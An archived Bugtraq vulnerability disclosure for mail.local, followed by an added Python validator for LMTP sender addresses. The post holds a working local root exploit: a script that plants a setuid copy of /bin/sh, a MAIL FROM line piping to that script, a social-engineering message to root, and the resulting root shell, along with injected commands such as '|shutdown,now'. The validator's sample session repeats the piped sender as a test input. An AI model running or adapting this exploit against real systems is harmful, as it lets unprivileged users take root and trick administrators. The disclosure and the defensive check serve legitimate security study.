Bugtraq mailing list archives

vulnerability in mail.local


From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Wed, 1 Nov 2000 18:57:10 GMT

hi,

mail.local is a little setuid root program designed, as its name suggests, for
local mail delivery.
Used with the -l option, we have an interactive mode in the LMTP protocol (a
simplified SMTP for local mail delivery only).
A weakness exists in the 'mail from' field that allows any local user to
insert a piped shell command that may be executed
by the recipient when he replies with the mail command. A little
social engineering skill should help to root the box.
Finally, mail.local shouldn't allow such escape chars even in the mail from
field, and the mail command shouldn't allow such
a reply through a pipe.

A space char in the command will terminate the string, so either you use a single
command like '|reboot' or use a comma, which should
be converted into a space by mail.
eg: '|shutdown,now'

Linux 2.4.0 beta Caldera, which was freely distributed during Defcon 00, is
vulnerable to this problem.

This looks like the old sendmail bugs.

nostalgia
=======

#cat exploit

#!/bin/sh
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh

#id
#id=666(c3rb3r) gid=100(user)
#
#cp exploit /tmp/@hotmail.com
#chmod a+x /tmp/@hotmail.com
#mail.local -l

....

mail from:<|/tmp/@hotmail.com>      U can use many senders to hide the evil
string
rcpt to:<root>
data
Subject:I have a problem

I need higher priviledge on this machine, can u do something for me please ?
thanx.
c3rb3r

.
quit
.....

(now wait for a reply and then, )

#ls /tmp
@hotmail.com
newsh

#/tmp/newsh
#id
#id=0(root) gid=0(root)
#echo 'very nice, thanx a lot'  | mail -s 'thanx' root    // With
thankfully


Have a nice day,


Gregory Duchemin
Security consultant

1001 bd Maisonneuve Ouest, suite 200
Montreal (Quebec) H3A 3C8 CANADA
c3rb3r () hotmail com
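The check the post says mail.local and mail should have made, written as an added example that is not part of the original post: it parses the reverse-path out of LMTP MAIL FROM commands and rejects a sender that starts with a pipe, contains shell metacharacters, or contains the comma that mail turns into a space. The address grammar is a deliberately conservative assumption, stricter than RFC 821, so quoted local parts are rejected too; the sample session is constructed, not the post's transcript.

```python
import re

# Conservative grammar (assumption): letters, digits and a few safe
# punctuation chars. Pipe, semicolon, backtick, quotes, comma, ... are out.
SAFE_LOCAL_PART = re.compile(r"^[A-Za-z0-9._+\-]+$")
SAFE_DOMAIN = re.compile(r"^[A-Za-z0-9.\-]+$")

# Characters the post shows being abused: the leading pipe that makes a reply
# spawn a process, and the comma that mail converts into a space.
SHELL_META = set("|;&`$()<>\"'\\, \t\r\n")

MAIL_FROM_RE = re.compile(r"^\s*mail\s+from\s*:\s*<(?P<path>[^>]*)>", re.IGNORECASE)

def parse_reverse_path(line):
    """Return the reverse-path inside MAIL FROM:<...>, or None for any other line."""
    m = MAIL_FROM_RE.match(line)
    return m.group("path") if m else None

def classify_reverse_path(path):
    """Return (accepted, reason). The empty path <> is the legitimate null sender."""
    if path == "":
        return True, "null sender"
    if path[0] == "|":
        return False, "pipe prefix: a naive reply would run it as a command"
    if any(c in SHELL_META for c in path):
        return False, "shell metacharacter in sender"
    local, sep, domain = path.rpartition("@")
    if not sep:
        local, domain = path, None
    if not SAFE_LOCAL_PART.match(local):
        return False, "local part fails conservative grammar"
    if domain is not None and not SAFE_DOMAIN.match(domain):
        return False, "domain fails conservative grammar"
    return True, "accepted"

def audit_session(lines):
    """Walk an LMTP session transcript and report every rejected sender."""
    findings = []
    for n, line in enumerate(lines, 1):
        path = parse_reverse_path(line)
        if path is None:
            continue
        ok, reason = classify_reverse_path(path)
        if not ok:
            findings.append((n, path, reason))
    return findings

# Constructed sample session (not the post's own transcript).
SAMPLE_SESSION = [
    "lhlo localhost",
    "mail from:<alice@example.org>",
    "rcpt to:<root>",
    "mail from:<|/tmp/@hotmail.com>",
    "mail from:<>",
    "mail from:<bob,now@example.org>",
]
```

Running `audit_session(SAMPLE_SESSION)` flags lines 4 and 6 (the piped sender and the comma-smuggled one) and accepts the ordinary address and the null sender.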
